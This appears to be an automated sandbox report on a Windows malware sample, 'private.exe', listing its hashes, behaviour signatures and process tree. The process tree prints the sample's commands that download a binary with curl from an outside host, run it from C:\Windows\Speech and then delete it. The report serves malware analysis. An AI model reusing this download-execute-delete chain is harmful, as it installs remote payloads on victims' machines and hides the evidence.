Analysis

  • max time kernel
    83s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    15-01-2025 05:36

General

  • Target

    private.exe

  • Size

    854KB

  • MD5

    53e14b277744d3c61cffb17f39ede98d

  • SHA1

    c8482d3ec8cb10df2d9f660920ab5d839d6e450f

  • SHA256

    f8b5a7f99a109c3bc007a3ef1e6fbbacbb0fae70951c3b020704df3106a54654

  • SHA512

    140dffe4e715ccaeec37ae3da9734c0fbd2b6b1e4337d75621dc8714ec13ab572cc2ee5885a1ec196758637f27ac50ff3970396db5c20885234a4a2e1e47c8fb

  • SSDEEP

    12288:Hnt46d+ktbUluYV/YH7Fso6veRSN2ff+zOe9egX7AlGq+nqnIr9BqiXb1FP:Hnt46Qi4ue/Do60OegX7Aoq+nmm7Vj

Score
6/10

Malware Config

Signatures

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\private.exe
    "C:\Users\Admin\AppData\Local\Temp\private.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1548
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      2⤵
        PID:1052
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/Z01XJyuAz2yPo4d4/client.bin --output C:\Windows\Speech\client.exe
        2⤵
          PID:2256
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Windows\Speech\client.exe
          2⤵
            PID:2320
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c del C:\Windows\Speech\client.exe
            2⤵
              PID:2508

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads